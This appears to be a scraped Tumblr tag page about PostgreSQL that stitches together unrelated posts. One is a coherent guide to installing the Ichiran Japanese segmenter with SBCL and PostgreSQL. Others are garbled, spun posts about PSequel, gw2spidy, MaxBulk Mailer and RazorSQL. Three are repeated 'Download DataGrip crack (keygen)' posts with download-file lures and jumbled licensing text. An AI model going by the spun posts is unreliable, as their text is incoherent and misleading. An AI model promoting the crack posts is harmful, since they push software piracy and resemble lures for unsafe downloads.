#my postgresql export works!!!
Explore tagged Tumblr posts
technicontrastron · 7 months ago
Text
Looking at data 👍
6 notes · View notes
gslin · 9 months ago
Text
0 notes
readevalprint · 4 years ago
Text
Ichiran@home 2021: the ultimate guide
Recently I’ve been contacted by several people who wanted to use my Japanese text segmenter Ichiran in their own projects. This is not surprising since it’s vastly superior to Mecab and similar software, and is occassionally updated with new vocabulary unlike many other segmenters. Ichiran powers ichi.moe which is a very cool webapp that helped literally dozens of people learn Japanese.
A big obstacle towards the adoption of Ichiran is the fact that it’s written in Common Lisp and people who want to use it are often unfamiliar with this language. To fix this issue, I’m now providing a way to build Ichiran as a command line utility, which could then be called as a subprocess by scripts in other languages.
This is a master post how to get Ichiran installed and how to use it for people who don’t know any Common Lisp at all. I’m providing instructions for Linux (Ubuntu) and Windows, I haven’t tested whether it works on other operating systems but it probably should.
PostgreSQL
Ichiran uses a PostgreSQL database as a source for its vocabulary and other things. On Linux install postgresql using your preferred package manager. On Windows use the official installer. You should remember the password for the postgres user, or create a new user if you know how to do it.
Download the latest release of Ichiran database. On the release page there are commands needed to restore the dump. On Windows they don't really work, instead try to create database and restore the dump using pgAdmin (which is usually installed together with Postgres). Right-click on PostgreSQL/Databases/postgres and select "Query tool...". Paste the following into Query editor and hit the Execute button.
CREATE DATABASE [database_name] WITH TEMPLATE = template0 OWNER = postgres ENCODING = 'UTF8' LC_COLLATE = 'Japanese_Japan.932' LC_CTYPE = 'Japanese_Japan.932' TABLESPACE = pg_default CONNECTION LIMIT = -1;
Then refresh the Databases folder and you should see your new database. Right-click on it then select "Restore", then choose the file that you downloaded (it wants ".backup" extension by default so choose "Format: All files" if you can't find the file).
You might get a bunch of errors when restoring the dump saying that "user ichiran doesn't exist". Just ignore them.
SBCL
Ichiran uses SBCL to run its Common Lisp code. You can download Windows binaries for SBCL 2.0.0 from the official site, and on Linux you can use the package manager, or also use binaries from the official site although they might be incompatible with your operating system.
However you really want the latest version 2.1.0, especially on Windows for uh... reasons. There's a workaround for Windows 10 though, so if you don't mind turning on that option, you can stick with SBCL 2.0.0 really.
After installing some version of SBCL (SBCL requires SBCL to compile itself), download the source code of the latest version and let's get to business.
On Linux it should be easy, just run
sh make.sh --fancy sudo sh install.sh
in the source directory.
On Windows it's somewhat harder. Install MSYS2, then run "MSYS2 MinGW 64-bit".
pacman -S mingw-w64-x86_64-toolchain make # for paths in MSYS2 replace drive prefix C:/ by /c/ and so on cd [path_to_sbcl_source] export PATH="$PATH:[directory_where_sbcl.exe_is_currently]" # check that you can run sbcl from command line now # type (sb-ext:quit) to quit sbcl sh make.sh --fancy unset SBCL_HOME INSTALL_ROOT=/c/sbcl sh install.sh
Then edit Windows environment variables so that PATH contains c:\sbcl\bin and SBCL_HOME is c:\sbcl\lib\sbcl (replace c:\sbcl here and in INSTALL_ROOT with another directory if applicable). Check that you can run a normal Windows shell (cmd) and run sbcl from it.
Quicklisp
Quicklisp is a library manager for Common Lisp. You'll need it to install the dependencies of Ichiran. Download quicklisp.lisp from the official site and run the following command:
sbcl --load /path/to/quicklisp.lisp
In SBCL shell execute the following commands:
(quicklisp-quickstart:install) (ql:add-to-init-file) (sb-ext:quit)
This will ensure quicklisp is loaded every time SBCL starts.
Ichiran
Find the directory ~/quicklisp/local-projects (%USERPROFILE%\quicklisp\local-projects on Windows) and git clone Ichiran source code into it. It is possible to place it into an arbitrary directory, but that requires configuring ASDF, while ~/quicklisp/local-projects/ should work out of the box, as should ~/common-lisp/ but I'm not sure about Windows equivalent for this one.
Ichiran wouldn't load without settings.lisp file which you might notice is absent from the repository. Instead, there's a settings.lisp.template file. Copy settings.lisp.template to settings.lisp and edit the following values in settings.lisp:
*connection* this is the main database connection. It is a list of at least 4 elements: database name, database user (usually "postgres"), database password and database host ("localhost"). It can be followed by options like :port 5434 if the database is running on a non-standard port.
*connections* is an optional parameter, if you want to switch between several databases. You can probably ignore it.
*jmdict-data* this should be a path to these files from JMdict project. They contain descriptions of parts of speech etc.
ignore all the other parameters, they're only needed for creating the database from scratch
Run sbcl. You should now be able to load Ichiran with
(ql:quickload :ichiran)
On the first run, run the following command. It should also be run after downloading a new database dump and updating Ichiran code, as it fixes various issues with the original JMdict data.
(ichiran/mnt:add-errata)
Run the test suite with
(ichiran/test:run-all-tests)
If not all tests pass, you did something wrong! If none of the tests pass, check that you configured the database connection correctly. If all tests pass, you have a working installation of Ichiran. Congratulations!
Some commands that can be used in Ichiran:
(ichiran:romanize "一覧は最高だぞ" :with-info t) this is basically a text-only equivalent of ichi.moe, everyone's favorite webapp based on Ichiran.
(ichiran/dict:simple-segment "一覧は最高だぞ") returns a list of WORD-INFO objects which contain a lot of interesting data which is available through "accessor functions". For example (mapcar 'ichiran/dict:word-info-text (ichiran/dict:simple-segment "一覧は最高だぞ") will return a list of separate words in a sentence.
(ichiran/dict:dict-segment "一覧は最高だぞ" :limit 5) like simple-segment but returns top 5 segmentations.
(ichiran/dict:word-info-from-text "一覧") gets a WORD-INFO object for a specific word.
ichiran/dict:word-info-str converts a WORD-INFO object to a human-readable string.
ichiran/dict:word-info-gloss-json converts a WORD-INFO object into a "json" "object" containing dictionary information about a word, which is not really JSON but an equivalent Lisp representation of it. But, it can be converted into a real JSON string with jsown:to-json function. Putting it all together, the following code will convert the word 一覧 into a JSON string:
(jsown:to-json (ichiran/dict:word-info-json (ichiran/dict:word-info-from-text "一覧")))
Now, if you're not familiar with Common Lisp all this stuff might seem confusing. Which is where ichiran-cli comes in, a brand new Command Line Interface to Ichiran.
ichiran-cli
ichiran-cli is just a simple command-line application that can be called by scripts just like mecab and its ilk. The main difference is that it must be built by the user, who has already did the previous steps of the Ichiran installation process. It needs to access the postgres database and the connection settings from settings.lisp are currently "baked in" during the build. It also contains a cache of some database references, so modifying the database (i.e. updating to a newer database dump) without also rebuilding ichiran-cli is highly inadvisable.
The build process is very easy. Just run sbcl and execute the following commands:
(ql:quickload :ichiran/cli) (ichiran/cli:build)
sbcl should exit at this point, and you'll have a new ichiran-cli (ichiran-cli.exe on Windows) executable in ichiran source directory. If sbcl didn't exit, try deleting the old ichiran-cli and do it again, it seems that on Linux sbcl sometimes can't overwrite this file for some reason.
Use -h option to show how to use this tool. There will be more options in the future but at the time of this post, it prints out the following:
>ichiran-cli -h Command line interface for Ichiran Usage: ichiran-cli [-h|--help] [-e|--eval] [-i|--with-info] [-f|--full] [input] Available options: -h, --help print this help text -e, --eval evaluate arbitrary expression and print the result -i, --with-info print dictionary info -f, --full full split info (as JSON) By default calls ichiran:romanize, other options change this behavior
Here's the example usage of these switches
ichiran-cli "一覧は最高だぞ" just prints out the romanization
ichiran-cli -i "一覧は最高だぞ" - equivalent of ichiran:romanize :with-info t above
ichiran-cli -f "一覧は最高だぞ" - outputs the full result of segmentation as JSON. This is the one you'll probably want to use in scripts etc.
ichiran-cli -e "(+ 1 2 3)" - execute arbitrary Common Lisp code... yup that's right. Since this is a new feature, I don't know yet which commands people really want, so this option can be used to execute any command such as those listed in the previous section.
By the way, as I mentioned before, on Windows SBCL prior to 2.1.0 doesn't parse non-ascii command line arguments correctly. Which is why I had to include a section about building a newer version of SBCL. However if you use Windows 10, there's a workaround that avoids having to build SBCL 2.1.0. Open "Language Settings", find a link to "Administrative language settings", click on "Change system locale...", and turn on "Beta: Use Unicode UTF-8 for worldwide language support". Then reboot your computer. Voila, everything will work now. At least in regards to SBCL. I can't guarantee that other command line apps which use locales will work after that.
That's it for now, hope you enjoy playing around with Ichiran in this new year. よろしくおねがいします!
6 notes · View notes
architecturepolh · 3 years ago
Text
Psequel alternative
Tumblr media
#Psequel alternative how to
#Psequel alternative for mac
#Psequel alternative update
#Psequel alternative pro
We response almost instantly to the bug reports, feature requests. Perhaps the best thing about being a user of TablePlus is having access to a really quick support. It has everything you need for a PostgreSQL GUI Tool. TablePlus is a modern, native tool with an elegant UI that allows you to simultaneously manage multiple databases such as MySQL, PostgreSQL, SQLite, Microsoft SQL Server and more. Then TablePlus is the app that you’re looking for.
#Psequel alternative how to
You don’t need to be a tool expert to figure out how to use it.
#Psequel alternative for mac
Sequel : Postgresql Gui Tool For Mac Download Has a well-thought design which works as you expected. You can be able to connect, create, update, delete, import, export your database and its data in a very fast and secure way. An app that can be able to get up and run in less than half a second or deal with heavy operations with a couple of million rows without freezing. Was built native to deliver the highest performance. You will probably need a PostgreSQL client that. Moving on with an alternative GUI tool for PostgreSQL It’s time to try something new and keep up with the latest changes.
#Psequel alternative update
In this fast-changing world where everything can be outdated easily, An app without speedy development and a frequent update schedule will never be able to deliver the best experience.įor most people, Psequel is no longer an available GUI for PostgreSQL. It’s also closed source and the developer had stated there were no plans to open source it before disappearing. Although no official statement has been issued, the development of PSequel had stopped and its has been filled with tons of unanswered questions, bug reports, and feature requests. That’s just great! Until PSequel died The latest version of PSequel which is V1.5.3 was released on. It gets SSH tunneling right while most of the others failed to do so. You can be able to do anything with your PostgreSQL database, creating, connecting, updating, deleting, you name it. The UI is simple and elegant, just somewhat similar to Sequel Pro. It was written from scratch in Swift 2 thus it’s really neat and clean.
#Psequel alternative pro
The main goal was just to bring the same experience of working with Sequel Pro from MySQL to PostgreSQL when Sequel Pro’s support for PostgreSQL never seems to happen.Īnd PSequel did a great job being a GUI client for Postgres. Got inspired by the simplicity and elegance of Sequel Pro, the developer behind PSequel wanted to build a PostgreSQL equivalent of it. Psequel was a great PostgreSQL GUI client. How do I support the development of PSequel? If you like PSequel, please report bugs and/or. If you don't have a Github account, you could report bugs. Please include your macOS, PostgreSQL and PSequel versions when reporting a bug. If you are reporting multiple bugs or suggesting multiple features, please create separate issues for each bug/feature. How do I report bugs or suggest new features? Please try not to create duplicate issues. If you think a feature is important, please let me know and I'll adjust its priority based on its popularity. My plan to implement most features in Sequel Pro. What's the current status of PSequel? PSequel is still in its early stage. Why macOS 10.10+ only? I am developing PSequel in my spare time.īy supporting macOS 10.10+ only, I can keep the codebase simpler and save time by not testing it in older versions of macOS. Is PSequel a forked version of Sequel Pro? No, PSequel is written from scratch in Swift 2, although PSequel's UI is highly inspired by Sequel Pro. Is PSequel open source? There is no plan to open source it at this moment. I just dislike Java desktop apps personally. I am a Java developer myself and I like JVM a lot. In the good old MySQL world, my favorite client is, but its support for PostgreSQL doesn't seem to be happening. However, they are either web-based, Java-based. However, I found its UI is clumsy and complicated. FAQ Why yet another PostgreSQL GUI client? Why not just pgAdmin? Well, pgAdmin is great for its feature-richness.
Sequel : Postgresql Gui Tool For Mac Download.
Tumblr media
0 notes
bonkerlon · 3 years ago
Text
Timekeeper gw2 spidy
Tumblr media
TIMEKEEPER GW2 SPIDY INSTALL
TIMEKEEPER GW2 SPIDY CODE
TIMEKEEPER GW2 SPIDY FREE
TIMEKEEPER GW2 SPIDY CODE
If you want to run the code that spiders through the trade market then you'll need command line access, if you just want to run the frontend code (and get a database dump from me) then you can live without ) The project will work fine with both Apache or Nginx (I actually run apache on my dev machine and nginx in production), you can find example configs in the docs folder of this project. On the PHP side of things I'm using PropelORM, thanks to that you could probably switch to PostgreSQL or MSSQL easily if you have to ) Apache / Nginx / CLI I think 4.x will suffice, though I run 5.x. You'll need the following extensions installed: You'll need PHP5.3 or higher for the namespace support etc. If you make your way to the IRC channel I have a VM image on my google drive (made by Marthisdil) with everything setup and ready to roll ) PHP 5.3
TIMEKEEPER GW2 SPIDY FREE
If you want to run this on a windows machine, for development purposes, then I strongly suggest you just run a virtual machine with linux (vmware player is free and works pretty nice). I run the project on a linux server and many of the requirements might not be available on windows and I have only (a tiny bit) of (negative) experience with windows. Me (Drakie) and other people already involved for a while are happy to share our knowledge and help you, specially if you consider contributing! Linux
TIMEKEEPER GW2 SPIDY INSTALL
There's also a INSTALL file which contains a snippet I copy paste when I setup my VM, it should suffice -) A LOT has changed and most likely will continue a while longer I'll provide you with some short setup instructions to make your life easier if you want to run the code for yourself or contribute. To continue the setup, go to "Crawling the Tradingpost". Note that this does only some of the crawling required to populate the database. When it's finished, visit localhost:8080 in a browser and you're ready to go. This will fetch the base virtual machine for developing (a Ubuntu Precise 64bit server), install all of the required packages, configure mysql and nginx, then forward the virtual machine's port 80 to your machine's port 8080. Once you have this, simply cd into the gw2spidy directory and run vagrant up. For this to work you will need three things: Virtualbox, Ruby, and the Vagrant gem. This method will provide you with a local virtual machine with a running instance of gw2spidy in a single command. The easiest way of getting started is by using Vagrant. Please join the Google Groups Mailing List for gw2spidy so that I can keep you up-to-date of any (major) changes / new versions of the Codebase! Environment setup Īll data is stored in the server's timezone, however I've made sure that data going out (charts and API) are converted to UTC (and Highcharts converts it to the browsers timezone). If you need help or have any feedback, you can contact me on or join me on #gw2spidy Drakie Date/time dataĪs usual I didn't really think about timezones when I started this project, but now that multiple people forked the project and that I'm exporting data to some people it suddenly matters. If you want a dump of the database, since that's a lot easier to work with, then just contact me ) Feedback / Help If you need any help with setup of the project or using git(hub) then just contact me and I'll be glad to help you! Now what I've built are some tools which will run constantly to automatically login to that website and record all data we can find, as a result I can record the sale listings for all the items about every hour and with that data I can create graphs with the price changing over time! ContributingĮveryone is very much welcome to contribute, 99% chance you're reading this on github so it shouldn't be too hard to fork and do pull requests right :) ? You can also access this website with a browser and use your game account to login and view all the items and listings. How does it work?ĪrenaNet has built the Trade Market so that it's loaded into the game from a website. This project aims to provide you with graphs of the sale and buy listings of items on the Guild Wars 2 Trade Market.
Tumblr media
0 notes
trustclips · 3 years ago
Text
Maxbulk mailer doesnt work
Tumblr media
#MAXBULK MAILER DOESNT WORK ACTIVATION KEY#
You also have support for international characters, a straightforward account manager with support for all type of authentication schemes including SSL, a complete and versatile list manager, support for importation from a wide range of sources including from remote mySQL and postgreSQL databases. Thanks to its advanced mail-merge and conditional functions you can send highly customized messages and get the best results of your campaigns. With MaxBulk Mailer you will create, manage and send your own powerful, personalized marketing message to your customers and potential customers. MaxBulk Mailer handles plain text, HTML and rich text documents and gives full support for attachments. MaxBulk Mailer is fast, fully customizable and very easy to use. MaxBulk Mailer is a full-featured and easy-to-use bulk mailer and mail-merge software for macOS and Windows that allows you to send out customized press releases, prices lists, newsletters and any kind of text or HTML documents to your customers or contacts. Why do I get a Delivery Report message after each delivery?
#MAXBULK MAILER DOESNT WORK ACTIVATION KEY#
How I can change the old activation key with the new one? How do I enter turboSMTP settings into MaxBulk Mailer Is Maxprog software prepared for macOS 12 Monterey? Is Maxprog software prepared for Windows 11? Is Maxprog software ready for the Apple ARM processor? MaxBulk Mailer works for both PC's and Macs. As a result, if the code doesnt work as expected, it is because of the code itself. I don't know about you, but I'm much more likely to give an e-mail a view if it looks like it was sent. How to use an alternative text when a tag value is empty MaxBulk Mailer sends your code as is, there is no modifications at all. What are the Zoho mail settings for MaxBulk Mailer? UPDATED How to export several lists into to a single file UPDATED How do I set up an unsubscribe link UPDATED How to add social networks icons to my message UPDATED Google ending support for less secure apps NEW Recent questions from our MaxBulk Mailer users
Tumblr media
0 notes
marketlong · 3 years ago
Text
Configure razorsql to connect to dynamo db
Tumblr media
CONFIGURE RAZORSQL TO CONNECT TO DYNAMO DB FULL
CONFIGURE RAZORSQL TO CONNECT TO DYNAMO DB PRO
CONFIGURE RAZORSQL TO CONNECT TO DYNAMO DB CODE
Export Tool – Export data in various formats.
CONFIGURE RAZORSQL TO CONNECT TO DYNAMO DB CODE
A robust programming editor that embeds the powerful EditRocket code editor that supports 20 programming languages including SQL, PL/SQL, TransactSQL, SQL PL, HTML, XML, and more.
Visual Tools for creating, editing, dropping, and executing stored procedures, functions, and triggers.
Visual tools for creating, editing, dropping, describing, altering, and viewing tables, views, indexes, and sequences.
An SQL Editor for creating SQL queries.
A Database Navigator for browsing database objects.
CONFIGURE RAZORSQL TO CONNECT TO DYNAMO DB PRO
You also may like to download HTTP Debugger Pro 8.17.īelow are some amazing features you can experience after installation of RazorSQL 8.0.4 freeload please keep in mind features may vary and totally depends if your system support them. RazorSQL is a SQL database query tool, SQL editor, database browser, and administration tool with support for all major databases and built in connection capabilities for DB2, Derby, Firebird, FrontBase, HSQLDB, Informix, Microsoft SQL Server, MySQL, OpenBase, Oracle, PostgreSQL, SQL Anywhere, SQLite, and Sybase. With RazorSQL you have the possibility to connect to any database you want, include multi-tabular display of queries and import data from various formats such as delimited files, Excel spreadsheets and fixed-width files.
CONFIGURE RAZORSQL TO CONNECT TO DYNAMO DB FULL
It is full offline installer standalone setup of RazorSQL 8.0.4 freeload for supported version of windows. The program and all files are checked and installed manually before uploading, program is working perfectly fine without any problem.
does not work.RazorSQL 8.0.4 freeload Latest Version for Windows.
I tried these out and found they weren’t what I needed. /layouts/BlogPost.astro Other DynamoDB GUI tools that don’t work for me: I want Command/Ctrl + S saved the updates to the document to the DB instead of having the browser prompt me to save the page to my hard drive. This lives in its own branch at while I figure out if it could be merged back into the main project. html, body, main Where do I get this code? In this case, main is the parent of nav, so main and its parents get their min-height set. For position:sticky to work the way I want it to, I always have to make sure all parent elements of the sticky elements have a min-height of 100vh. Sticky positioning on the Save & Edit buttons
Make the save & delete buttons used fixed positioning so that they are always available at the top of the screen, even after I’ve scrolled down the page.
Made the CodeMirror editor expand to always show 100% of the document so that my browse’s native search feature can always search the whole document instead just the content on screen.
I set up JSON validation which will notify me about invalid JSON in the editor’s gutter.
CodeMirror is used by CodePen which I’m more familiar with, so I switched to that. I tried configuring the built-in with Ace editor, but couldn’t get it to behave the way I wanted. Replacing the Ace text editor with CodeMirror
JSON validation of documents in DynamoDB.
It’s the best I’ve found yet, because:Īlso, it’s open source, which means… But I can make it betterĪfter using it for few weeks, I wanted to improve a few things: I found a browser-based GUI to work with my local DynamoDB instance during development: dynamodb-admin by Aaron Shafovaloff.
Tumblr media
0 notes
datagrip-crack-5m · 3 years ago
Text
Download DataGrip crack (keygen) latest version T4O?
Tumblr media
💾 ►►► DOWNLOAD FILE 🔥🔥🔥 Datagrip license Any exercise of rights under this license by you or your sub-licensees is subject to the following conditions: 1. Redistributions of this software, with or without modification, must reproduce the above copyright notice and the above license statement as well as this list of conditions, in the software, the user documentation and any other. All recent versions of JetBrains desktop software allow using JetBrains Account credentials as a way of providing licensing information. Exporting a PostgreSQL database. Access the command line on the computer where the database is stored. On-the-fly analysis and quick-fixes: DataGrip detects probable bugs in your code and suggests the best options to fix them on the fly. It will immediately let you know about unresolved objects, using keywords as identifiers and always offers the way to fix problems. Note: the price shown in the listing is that of a 1-year individual customer. DataGrip is covered by a perpetual fallback license, which allows you to use a specific version of software without an active subscription for it. The license also includes all bugfix updates, more specifically in X. Z version all Z releases are included. When purchasing an annual subscription, you will immediately get a perpetual fallback. Includes 17 tools. Updated subscription pricing starting October 1, JetBrains DataGrip Tag: jetbrains-license github Details for datagrip License. Proprietary; Last updated. Show more. Enable snaps on Ubuntu and install datagrip. Snaps are applications packaged with all their dependencies to run on all popular Linux distributions from a single build. They update automatically and roll back gracefully. License : Unknown. Installation scoop install DataGrip -portable. See our GitHub page and the Scoop website for more info. DataGrip is a database management environment for developers. It is designed to query, create, and manage databases. Databases can work locally, on a server, or in the cloud.. Datagrip license. Follow edited Apr 27, at Anton Dozortsev Anton Dozortsev. Purchasing a new DataGrip license also entitles you to use previous versions of the same software. DataGrip Subscriptions are backwards compatible and can be used with any previous versions that are still available for download. Versions released on Nov 2, and later can be activated with a JetBrains Account username and password or. DataGrip is a multi-engine database environment. This plugin will bring first-class support for any VCS you need. Any exercise of rights under this license by you or your sub-licensees is subject to the following conditions: 1. Datagrip Jetbrains License Server. Search and navigation tips. When you work with a software tool, you often need to find something or other. In DataGrip, you could be looking for things like: — Database objects: tables, views, procedures, columns and so on. I am using datagrip as the main demonstration of the problem, because it provides some debug information when testing the connection, but I have tried on dbeaver and tableplus, both failed to connect. Other users in my organization are able to connect to the remote mysql server just fine on macos machines. Logs from datagrip:. A new DataGrip Search: Goland License Server. Free Educational Licenses for JetBrains' tools. Free License Programs. Free Educational Licenses. Learn or teach coding with best-in-class development tools from JetBrains! DataGrip Total downloads: 4 1 last week Latest version: 1. Report incorrect info. JetBrains DataGrip 1. We cannot confirm if there is a free download of this software available. Universities, colleges, schools, and non-commercial educational organizations are eligible for free licensing to install all JetBrains tools in classrooms and computer labs for educational purposes. What is Datagrip tutorial. The action time can be either before or after a row is modified.
1 note · View note
datagrip-crack-ma · 3 years ago
Text
Download DataGrip crack (keygen) latest version G4CH#
Tumblr media
💾 ►►► DOWNLOAD FILE 🔥🔥🔥 Datagrip license DataGrip is a tool in the Database Tools category of a tech stack. Explore DataGrip's Story. I am using datagrip as the main demonstration of the problem, because it provides some debug information when testing the connection, but I have tried on dbeaver and tableplus, both failed to connect. Other users in my organization are able to connect to the remote mysql server just fine on macos machines. Logs from datagrip:. If you want to get a DataGrip license for free or at a discount, check out the offers on the following page: Toolbox Subscription - Special Offers. If you have any questions, contact our sales support. Free individual licenses are available for students, faculty members, and core contributors to open source projects. Useful links. DataGrip Buy with confidence from the JetBrains licensing experts. The serial number for DataGrip is available. This release was created for you, eager to use DataGrip Xtra full and without limitations. Our intentions are not to harm DataGrip software company but to give the possibility to those who can not pay for any piece of software out there. This should be your intention too, as a user, to fully evaluate. Visual Query Builder. Data Report Wizard. Database Designer. Query Builder. With the help of this intelligent MySQL client the work with data and code has. On-the-fly analysis and quick-fixes: DataGrip detects probable bugs in your code and suggests the best options to fix them on the fly. It will immediately let you know about unresolved objects, using keywords as identifiers and always offers the way to fix problems. Note: the price shown in the listing is that of a 1-year individual customer. This plugin will bring first-class support for any VCS you need. Are managed by faculty members, professors, IT support staff, and other official representatives of your educational organization. License administrators manage the licenses in their JetBrains Account. Are valid for one year and can be renewed in the 30 days before the license expiration date. Must be used only for teaching classes. Software Licenses Allows you to execute queries in different modes and provides local history that keeps track of all your activity and protects you from losing your work. Lets you jump to any table, view, or procedure by its name via corresponding action, or. JetBrains DataGrip Todo o mundo. Download JetBrains DataGrip The license also includes all bugfix updates, more specifically in X. Select this option if you want non-trusted certificates that is the certificates that are not added to the list. What is Jetbrains License Server Github. Likes: Shares: You can also use gists to save and share console output when running, debugging, or testing your code. A new DataGrip Search: Goland License Server. Exporting a PostgreSQL database. Access the command line on the computer where the database is stored. Details for datagrip License. Proprietary; Last updated. Show more. Enable snaps on Ubuntu and install datagrip. Snaps are applications packaged with all their dependencies to run on all popular Linux distributions from a single build. They update automatically and roll back gracefully. Each Db2 database product and offering has a license certificate file associated with it. The license certificate file should be registered before using the Db2 database product or offering. To verify license compliance, run the db2licm command and generate a compliance report. Discounted and complimentary licenses. FREE for students and teachers. FREE for education and training. The cost of a term license depends upon its length in time and, of course, its use. Many software licenses specify a limited time period or term during which the user will be permitted to use the software. At the end of the term, you must stop using the software unless a new license is purchased or the term is extended through an agreement with. ISL Online license doesn't limit the number or workstations of clients, users, and users you can support. DataGrip DataGrip - subscription license 3rd year - 1 user. Part: C-S. Advertised Price. Add to Cart. DataGrip includes an evaluation license key for a free day trial. Do Leetcode exercises in IDE, support leetcode. License : Unknown. Installation scoop install DataGrip -portable. See our GitHub page and the Scoop website for more info. DataGrip is a database management environment for developers. It is designed to query, create, and manage databases. Databases can work locally, on a server, or in the cloud.. If you have settings you want to keep, like fonts, colours, inspections, etc, you wan to keep. Using other programs like HeidiSQL im able to connect but when i try to connect using datagrip i get the following error: [] The connection attempt failed. SocketException: Connection reset. All Right Reserved Anyone with information is asked to contact us at Tag: jetbrains-license github
1 note · View note
datagrip-crack-mu · 3 years ago
Text
Download DataGrip crack (serial key) latest version 8E9?
Tumblr media
💾 ►►► DOWNLOAD FILE 🔥🔥🔥 Datagrip license Compare DataGrip vs. PyCharm vs. Visual Studio Code using this comparison chart. Compare price, features, and reviews of the software side-by-side to. Datagrip license. Follow edited Apr 27, at Anton Dozortsev Anton Dozortsev. Exporting a PostgreSQL database. Access the command line on the computer where the database is stored. Using other programs like HeidiSQL im able to connect but when i try to connect using datagrip i get the following error: [] The connection attempt failed. SocketException: Connection reset. I am using datagrip as the main demonstration of the problem, because it provides some debug information when testing the connection, but I have tried on dbeaver and tableplus, both failed to connect. Other users in my organization are able to connect to the remote mysql server just fine on macos machines. Logs from datagrip:. Are valid for one year and can be renewed in the 30 days before the license expiration date. Must be used only for teaching classes. Gif Recorder 3. DataGrip First I tried to use localhost as my host, but it uses, of course, Windows psql service instead of ubuntu's.. DataGrip is a tool in the Database Tools category of a tech stack. Explore DataGrip's Story. Software Licenses Allows you to execute queries in different modes and provides local history that keeps track of all your activity and protects you from losing your work. Lets you jump to any table, view, or procedure by its name via corresponding action, or. If you are keeping the software and want to use it longer than its trial time, we strongly encourage you purchasing the license key from DataGrip official website. Our releases are to prove that we can! Nothing can stop us, we keep fighting for freedom despite all the difficulties we face each day. On-the-fly analysis and quick-fixes: DataGrip detects probable bugs in your code and suggests the best options to fix them on the fly. It will immediately let you know about unresolved objects, using keywords as identifiers and always offers the way to fix problems. Note: the price shown in the listing is that of a 1-year individual customer. Purchasing a new DataGrip license also entitles you to use previous versions of the same software. DataGrip Subscriptions are backwards compatible and can be used with any previous versions that are still available for download. Versions released on Nov 2, and later can be activated with a JetBrains Account username and password or. I copied the endpoint from AWS console and I'm using the username and password I entered when creating the instance. What am I doing wrong?. This plugin will bring first-class support for any VCS you need. JetBrains DataGrip Details for datagrip License Proprietary Last updated 12 May DataGrip is a multi-engine database environment. DataGrip is a great tool for accessing a wide range of databases. You can get a free 30 day evaluation license. But perhaps you want to evaluate for a tiny bit longer? DataGrip is a great tool for. Datagrip Jetbrains License Server. Search and navigation tips. When you work with a software tool, you often need to find something or other. In DataGrip, you could be looking for things like: — Database objects: tables, views, procedures, columns and so on. If you want to get a DataGrip license for free or at a discount, check out the offers on the following page: Toolbox Subscription - Special Offers. If you have any questions, contact our sales support. Free individual licenses are available for students, faculty members, and core contributors to open source projects. Useful links. A new DataGrip Search: Goland License Server. It works also PhpStorm Versions released on Nov 2, and later can be activated with a JetBrains Account username and password or A - Overview. DataGrip is a database management environment for developers. It is designed to query, create, and manage databases. Databases can work locally, on a server, or in the cloud.
1 note · View note
datagrip-crack-z8 · 3 years ago
Text
Download DataGrip crack (license key) latest version U17T+
Tumblr media
💾 ►►► DOWNLOAD FILE 🔥🔥🔥 Datagrip license Compare DataGrip vs. PyCharm vs. Visual Studio Code using this comparison chart. Compare price, features, and reviews of the software side-by-side to. Datagrip license. Follow edited Apr 27, at Anton Dozortsev Anton Dozortsev. Exporting a PostgreSQL database. Access the command line on the computer where the database is stored. Using other programs like HeidiSQL im able to connect but when i try to connect using datagrip i get the following error: [] The connection attempt failed. SocketException: Connection reset. I am using datagrip as the main demonstration of the problem, because it provides some debug information when testing the connection, but I have tried on dbeaver and tableplus, both failed to connect. Other users in my organization are able to connect to the remote mysql server just fine on macos machines. Logs from datagrip:. Are valid for one year and can be renewed in the 30 days before the license expiration date. Must be used only for teaching classes. Gif Recorder 3. DataGrip First I tried to use localhost as my host, but it uses, of course, Windows psql service instead of ubuntu's.. DataGrip is a tool in the Database Tools category of a tech stack. Explore DataGrip's Story. Software Licenses Allows you to execute queries in different modes and provides local history that keeps track of all your activity and protects you from losing your work. Lets you jump to any table, view, or procedure by its name via corresponding action, or. If you are keeping the software and want to use it longer than its trial time, we strongly encourage you purchasing the license key from DataGrip official website. Our releases are to prove that we can! Nothing can stop us, we keep fighting for freedom despite all the difficulties we face each day. On-the-fly analysis and quick-fixes: DataGrip detects probable bugs in your code and suggests the best options to fix them on the fly. It will immediately let you know about unresolved objects, using keywords as identifiers and always offers the way to fix problems. Note: the price shown in the listing is that of a 1-year individual customer. Purchasing a new DataGrip license also entitles you to use previous versions of the same software. DataGrip Subscriptions are backwards compatible and can be used with any previous versions that are still available for download. Versions released on Nov 2, and later can be activated with a JetBrains Account username and password or. I copied the endpoint from AWS console and I'm using the username and password I entered when creating the instance. What am I doing wrong?. This plugin will bring first-class support for any VCS you need. JetBrains DataGrip Details for datagrip License Proprietary Last updated 12 May DataGrip is a multi-engine database environment. DataGrip is a great tool for accessing a wide range of databases. You can get a free 30 day evaluation license. But perhaps you want to evaluate for a tiny bit longer? DataGrip is a great tool for. Datagrip Jetbrains License Server. Search and navigation tips. When you work with a software tool, you often need to find something or other. In DataGrip, you could be looking for things like: — Database objects: tables, views, procedures, columns and so on. If you want to get a DataGrip license for free or at a discount, check out the offers on the following page: Toolbox Subscription - Special Offers. If you have any questions, contact our sales support. Free individual licenses are available for students, faculty members, and core contributors to open source projects. Useful links. A new DataGrip Search: Goland License Server. It works also PhpStorm Versions released on Nov 2, and later can be activated with a JetBrains Account username and password or A - Overview. DataGrip is a database management environment for developers. It is designed to query, create, and manage databases. Databases can work locally, on a server, or in the cloud.
1 note · View note
pathloading742 · 4 years ago
Text
Free Download Postgresql Database Design Tool Programs
Tumblr media
Free Download Postgresql Database Design Tool Programs Free
Free Download Postgresql Database Design Tool Programs Pdf
Tumblr media Tumblr media
Free Download Postgresql Database Design Tool Programs Free
The 13.1 version of PostgreSQL is available as a free download on our website. PostgreSQL belongs to Development Tools. The most popular versions among PostgreSQL users are 13.0, 12.4 and 12.3. The actual developer of the free software is PostgreSQL Global Development Group. The latest version of the program is supported on PCs running Windows. Top 5 Free Database Diagram Design Tools by Anthony Thong Do. A database schema is the blueprints of your database, it represents the description of a database structure, data types, and the constraints on the database. And designing database schemas is one of the very first and important steps to start developing any software/website.
Free Download Postgresql Database Design Tool Programs Pdf
Tumblr media
It is a practical DBA's Swiss Army knife
If you dig into Oracle, Postgres, SQL Server, DB2, MySQL, and other databases regularly, this tool is for you! DbVis has an excellent table/query browser with advanced display, export, filtering capability, a powerful table editor, great transaction control, great import capabilities, and tools to navigate physical database structure. One can 'sling' data between databases of varying types with ease, even LARGE data sets, if necessary. It's not an ETL tool. It is a practical DBA's Swiss Army knife.
